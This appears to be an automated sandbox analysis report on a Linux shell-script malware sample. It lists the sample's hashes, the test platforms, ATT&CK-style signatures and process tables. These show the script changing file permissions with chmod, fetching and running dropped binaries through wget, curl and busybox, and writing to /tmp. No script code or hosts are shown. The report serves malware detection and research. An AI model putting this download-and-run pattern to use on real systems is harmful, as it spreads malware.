Analysis
max time kernel
12s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
-
Size
10KB
-
MD5
5ecd8e3f2eb51a7dc020f24e33b8cc57
-
SHA1
be4322853738933aa75ef6ade68437e1c6290afe
-
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
-
SHA512
f43f15b94f1eab3f628a22d9dec691977126ced5801a808fc091f5847ab5cb1bf5bce49da1056fa82a1c14ccecddf1d0c76ecab6fcb74951c56b7c87a331dce1
-
SSDEEP
192:eyoVNmlHxyrasCqOpG+qpOVNmlHx3qOpG+0:e/VNmlRyrasH8VNmlRm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1560  chmod
1566  chmod
1512  chmod
1518  chmod
1542  chmod
1572  chmod
1626  chmod
1656  chmod
1524  chmod
1548  chmod
1602  chmod
1614  chmod
1506  chmod
1596  chmod
1620  chmod
1608  chmod
1638  chmod
1650  chmod
1530  chmod
1536  chmod
1584  chmod
1632  chmod
1644  chmod
1662  chmod
1578  chmod
1554  chmod
1590  chmod
1668  chmod
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid   Process
1571  busybox
1573  8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
1624  curl
1627  8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
1628  rm
1569  wget
1570  curl
1574  rm
1623  wget
1625  busybox
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97